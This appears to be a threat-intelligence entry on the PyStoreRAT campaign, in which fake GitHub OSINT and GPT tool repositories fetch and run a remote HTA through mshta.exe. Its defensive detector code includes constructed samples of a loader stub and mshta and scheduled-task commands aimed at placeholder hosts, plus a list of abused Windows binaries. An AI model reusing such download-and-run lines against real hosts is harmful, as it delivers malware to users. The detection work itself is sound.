Fake OSINT and GPT Utility GitHub Repos Spread PyStoreRAT Malware Payloads
Cybersecurity researchers are calling attention to a new campaign that's leveraging GitHub-hosted Python repositories to distribute a previously undocumented JavaScript-based Remote Access Trojan (RAT) dubbed PyStoreRAT. "These repositories, often themed as development utilities or OSINT tools, contain only a few lines of code responsible for silently downloading a remote HTA file and executing
AI Analysis
Technical Summary
The PyStoreRAT campaign distributes malware through GitHub-hosted Python repositories that masquerade as legitimate OSINT tools, GPT wrappers, and development utilities. Each repository contains only a few lines of code, whose sole job is to silently download a remote HTML Application (HTA) file and execute it with mshta.exe, a signed Windows binary that is routinely abused to run script payloads because its activity looks like ordinary system behaviour.

PyStoreRAT itself is a modular, multi-stage Remote Access Trojan that can run a wide range of payload formats: EXE, DLL, PowerShell scripts, MSI packages, Python scripts, and JavaScript. Its capabilities include system profiling, privilege checking, and targeted theft of cryptocurrency wallet files from Ledger Live, Trezor, Exodus, Atomic, Guarda, and BitBox02.

To reduce visibility, the loader stub checks for installed security products, looking specifically for strings related to CrowdStrike Falcon and Cybereason, and changes its execution method accordingly. Persistence is a scheduled task disguised as an NVIDIA app self-update. The implant polls its command-and-control servers for instructions, which include downloading and executing additional payloads, running PowerShell commands in memory, spreading through removable drives by replacing legitimate documents with malicious shortcuts, and deleting forensic artifacts.

The campaign exploits the trust placed in GitHub: repository popularity metrics are artificially inflated and the code is published from dormant or newly created accounts, which makes the malicious repositories hard to tell apart from genuine ones. Russian-language artifacts suggest an Eastern European threat actor. Taken together, the campaign illustrates a shift towards modular, script-based implants that adapt to the security controls they find and stay below the radar of traditional endpoint detection and response (EDR) tooling until late in the infection chain.
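The two host-side behaviours described above that are cheapest to detect are the mshta.exe launch against a remote HTA and the NVIDIA-lookalike scheduled task. The following is an added example written for this page, not code from the article or from the researchers who analysed PyStoreRAT: a small detector that runs over process-creation records (the fields Sysmon Event ID 1 or any EDR exposes) and flags both patterns. The sample events are constructed; the task name, the `.invalid` hostname and the assumption that a genuine NVIDIA task target lives under an NVIDIA Corporation program directory are illustrative choices, not indicators from the report.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass
class ProcessEvent:
    """Minimal process-creation record (the fields Sysmon Event ID 1 or EDR telemetry provide)."""
    image: str
    command_line: str
    parent_image: str


REMOTE_URL = re.compile(r"\b(?:https?|ftp)://", re.IGNORECASE)
# Parents that indicate mshta was launched by a script or shell rather than by a user double-click.
SCRIPT_PARENTS = {"cmd.exe", "python.exe", "pythonw.exe", "powershell.exe", "pwsh.exe",
                  "wscript.exe", "cscript.exe"}
# Where a genuine NVIDIA task target would normally live (an assumption of this example, not from the article).
NVIDIA_DIRS = ("program files\\nvidia corporation", "program files (x86)\\nvidia corporation")


def _basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def _switch_value(command_line: str, switch: str) -> Optional[str]:
    """Return the argument that follows a schtasks switch such as /tn or /tr, honouring quotes."""
    pattern = re.escape(switch) + r'\s+(?:"([^"]*)"|(\S+))'
    m = re.search(pattern, command_line, re.IGNORECASE)
    if not m:
        return None
    return m.group(1) if m.group(1) is not None else m.group(2)


def detect(event: ProcessEvent) -> List[str]:
    """Return the reasons this event is suspicious (empty list when it is not)."""
    findings: List[str] = []
    image = _basename(event.image)
    parent = _basename(event.parent_image)
    cmd = event.command_line

    if image == "mshta.exe":
        if REMOTE_URL.search(cmd):
            findings.append("mshta.exe launched with a remote URL argument")
        if parent in SCRIPT_PARENTS:
            findings.append(f"mshta.exe spawned by {parent}")

    if image == "schtasks.exe" and re.search(r"/create\b", cmd, re.IGNORECASE):
        name = _switch_value(cmd, "/tn") or ""
        target = _switch_value(cmd, "/tr") or ""
        if "nvidia" in name.lower() and not any(d in target.lower() for d in NVIDIA_DIRS):
            findings.append(f"scheduled task {name!r} is named after NVIDIA but runs {target!r}")
    return findings


def triage(events: List[ProcessEvent]) -> Dict[int, List[str]]:
    """Map event index -> findings for every event that fired."""
    alerts: Dict[int, List[str]] = {}
    for i, event in enumerate(events):
        findings = detect(event)
        if findings:
            alerts[i] = findings
    return alerts


# Constructed sample telemetry (not real campaign data).
SAMPLE_EVENTS = [
    # 0: the loader-stub behaviour: cmd.exe runs mshta against a remote HTA
    ProcessEvent(r"C:\Windows\System32\mshta.exe",
                 "mshta.exe https://cdn.example.invalid/helper.hta",
                 r"C:\Windows\System32\cmd.exe"),
    # 1: benign local HTA opened by the user from Explorer
    ProcessEvent(r"C:\Windows\System32\mshta.exe",
                 r'"C:\Windows\System32\mshta.exe" "C:\Program Files\Vendor\setup.hta"',
                 r"C:\Windows\explorer.exe"),
    # 2: persistence: task named after NVIDIA but pointing at a script in a user-writable directory
    ProcessEvent(r"C:\Windows\System32\schtasks.exe",
                 'schtasks.exe /create /tn "NVIDIA App Self Update" '
                 '/tr "wscript.exe C:\\Users\\Public\\nvupd.js" /sc minute /mo 10 /f',
                 r"C:\Windows\System32\cmd.exe"),
    # 3: a task whose target lives where an NVIDIA component would (not flagged)
    ProcessEvent(r"C:\Windows\System32\schtasks.exe",
                 'schtasks.exe /create /tn "NVIDIA App Self Update" '
                 '/tr "C:\\Program Files\\NVIDIA Corporation\\NVIDIA App\\NVIDIA App.exe --update" /sc daily',
                 r"C:\Program Files\NVIDIA Corporation\NVIDIA App\NVIDIA App.exe"),
]

if __name__ == "__main__":
    for idx, reasons in triage(SAMPLE_EVENTS).items():
        print(idx, reasons)
```

The parent-process check matters more than the URL check in practice: the stub may stage the HTA to disk first, in which case only the unusual parent (a Python interpreter or cmd.exe launched from one) gives it away.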
Potential Impact
For European organizations, the PyStoreRAT campaign poses significant risks, particularly to software developers, cybersecurity researchers, and cryptocurrency holders who frequently use GitHub-hosted tools. The malware’s ability to steal sensitive cryptocurrency wallet data threatens financial assets and could lead to direct monetary losses. Its modular nature and capability to execute diverse payloads increase the risk of system compromise, data exfiltration, and lateral movement within networks. The stealthy evasion techniques reduce the likelihood of early detection, potentially allowing attackers prolonged access to sensitive environments. Organizations involved in DeFi, blockchain development, or those maintaining cryptocurrency infrastructure are especially vulnerable. Additionally, the abuse of trusted platforms like GitHub undermines supply chain security, increasing the risk of widespread infection through legitimate development workflows. The persistence mechanism and ability to delete forensic traces complicate incident response and recovery efforts. Overall, this threat could lead to confidentiality breaches, integrity violations, and operational disruptions across affected European enterprises.
Mitigation Recommendations
European organizations should implement a multi-layered defense strategy that goes beyond generic advice:
- Enforce strict vetting and validation of third-party code repositories, especially those sourced from GitHub, by integrating automated code analysis and reputation scoring that flags minimal or suspicious code patterns indicative of loader stubs.
- Employ behavioral detection that monitors for anomalous mshta.exe executions, particularly those initiated via cmd.exe or passed a remote HTA URL.
- Enhance endpoint detection and response coverage to identify script-based modular implants and unusual scheduled tasks, such as those masquerading as NVIDIA updates.
- Implement network monitoring and egress filtering to detect and block communications with known or suspicious command-and-control servers.
- Educate developers and analysts on the risks of blindly trusting popular GitHub repositories, emphasizing verification of repository authenticity and recent activity patterns.
- Use application whitelisting to restrict execution of unauthorized scripts and binaries.
- Regularly audit scheduled tasks and other persistence mechanisms for anomalies.
- Collaborate with GitHub and security communities to report and remove malicious repositories promptly, and consider deploying deception technologies to detect spread via removable drives.
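The first recommendation, automated analysis that flags loader-stub patterns before a repository is run, can be approximated with a static pass over the Python source. The block below is an added example for this page and is not code from the article, from the researchers, or from any product; it uses Python's `ast` module to find shell or process-spawning calls whose string arguments name a Windows script host or carry a remote URL, resolving module-level string constants so a URL stored in a variable is still seen, and applies a size heuristic for "the whole program is just a launcher". Both input programs are constructed stand-ins: the `.invalid` hostname, the 40-line threshold and the list of binaries are assumptions of the example.

```python
import ast
from dataclasses import dataclass
from typing import Dict, List

# Shell / process-spawning calls as they appear in source (dotted, or bare after `from x import y`).
SHELL_CALLS = {"os.system", "os.popen", "subprocess.run", "subprocess.Popen", "subprocess.call",
               "subprocess.check_call", "subprocess.check_output", "system", "popen", "Popen",
               "check_call", "check_output"}
# Windows binaries a loader stub typically hands a downloaded script to (assumption of this example).
LOLBINS = ("mshta", "wscript", "cscript", "rundll32", "regsvr32", "certutil", "bitsadmin")
MAX_STUB_LINES = 40  # "tiny program" threshold; an assumption of this example


@dataclass
class Finding:
    lineno: int
    reason: str


def _call_name(call: ast.Call) -> str:
    func = call.func
    if isinstance(func, ast.Attribute) and isinstance(func.value, ast.Name):
        return f"{func.value.id}.{func.attr}"
    if isinstance(func, ast.Name):
        return func.id
    return ""


def _module_constants(tree: ast.AST) -> Dict[str, str]:
    """Collect NAME = "literal" assignments so a URL kept in a variable is still visible."""
    consts: Dict[str, str] = {}
    for node in ast.walk(tree):
        if (isinstance(node, ast.Assign) and len(node.targets) == 1
                and isinstance(node.targets[0], ast.Name)
                and isinstance(node.value, ast.Constant) and isinstance(node.value.value, str)):
            consts[node.targets[0].id] = node.value.value
    return consts


def _strings_under(call: ast.Call, consts: Dict[str, str]) -> str:
    """Concatenate every string literal (or resolvable constant name) in the call's arguments."""
    parts: List[str] = []
    for arg in list(call.args) + [kw.value for kw in call.keywords]:
        for node in ast.walk(arg):
            if isinstance(node, ast.Constant) and isinstance(node.value, str):
                parts.append(node.value)
            elif isinstance(node, ast.Name) and node.id in consts:
                parts.append(consts[node.id])
    return " ".join(parts).lower()


def scan_source(src: str) -> List[Finding]:
    tree = ast.parse(src)
    consts = _module_constants(tree)
    findings: List[Finding] = []
    for node in ast.walk(tree):
        if not isinstance(node, ast.Call):
            continue
        name = _call_name(node)
        if name in SHELL_CALLS:
            blob = _strings_under(node, consts)
            hits = [b for b in LOLBINS if b in blob]
            if hits:
                findings.append(Finding(node.lineno, f"{name} invokes {', '.join(hits)}"))
            if "http://" in blob or "https://" in blob:
                findings.append(Finding(node.lineno, f"{name} receives a remote URL"))
        elif name in ("exec", "eval"):
            findings.append(Finding(node.lineno, f"{name} executes dynamically built code"))
    return findings


def is_loader_stub(src: str) -> bool:
    """A tiny program whose only notable action is spawning a script host or fetching a URL."""
    code_lines = [l for l in src.splitlines() if l.strip() and not l.strip().startswith("#")]
    return bool(scan_source(src)) and len(code_lines) <= MAX_STUB_LINES


# Constructed stand-in for the few-line stub the article describes (not the real sample).
SUSPECT_SOURCE = '''\
import os
URL = "https://updates.example.invalid/tool.hta"
def main():
    # pretends to be an OSINT helper but only launches mshta against a remote HTA
    os.system("cmd /c start /min mshta " + URL)
    print("OSINT helper ready")
main()
'''

# Constructed benign utility: spawns a process, but nothing that warrants a flag.
BENIGN_SOURCE = '''\
import subprocess, json
def run_whois(domain):
    out = subprocess.run(["whois", domain], capture_output=True, text=True)
    return out.stdout
if __name__ == "__main__":
    print(json.dumps({"whois": run_whois("example.com")}))
'''

if __name__ == "__main__":
    for label, src in (("suspect", SUSPECT_SOURCE), ("benign", BENIGN_SOURCE)):
        print(label, is_loader_stub(src), [(f.lineno, f.reason) for f in scan_source(src)])
```

This is a triage filter, not a verdict: a stub that builds its command from base64 or string slicing will defeat the literal matching, which is why the `exec`/`eval` branch and the size heuristic are there to route such repositories to a human before anyone runs them.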
Affected Countries
Germany, France, United Kingdom, Netherlands, Sweden, Poland, Italy, Spain
Technical Details
- Article source: https://thehackernews.com/2025/12/fake-osint-and-gpt-utility-github-repos.html (fetched 2025-12-12T19:21:32Z, 1465 words)
Threat ID: 693c6b3f53767fe238bb232a
Added to database: 12/12/2025, 7:21:35 PM
Last enriched: 12/12/2025, 7:21:53 PM
Last updated: 12/14/2025, 12:09:52 PM